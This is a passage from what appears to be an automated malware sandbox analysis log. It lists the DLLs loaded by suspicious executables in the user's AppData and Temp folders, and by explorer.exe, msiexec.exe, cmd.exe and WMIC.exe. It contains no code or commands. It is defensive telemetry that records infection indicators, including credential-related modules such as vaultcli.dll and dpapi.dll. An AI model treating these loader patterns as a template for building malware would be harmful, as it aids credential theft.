Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hehcrfb	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fihcrfb	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: aepic.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.dll
Source: C:\Windows\explorer.exe	Section loaded: userenv.dll
Source: C:\Windows\explorer.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\explorer.exe	Section loaded: powrprof.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: dxgi.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: propsys.dll
Source: C:\Windows\explorer.exe	Section loaded: coremessaging.dll
Source: C:\Windows\explorer.exe	Section loaded: urlmon.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: windows.storage.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe	Section loaded: wininet.dll
Source: C:\Windows\explorer.exe	Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe	Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe	Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe	Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wldp.dll
Source: C:\Windows\explorer.exe	Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe	Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe	Section loaded: netutils.dll
Source: C:\Windows\explorer.exe	Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
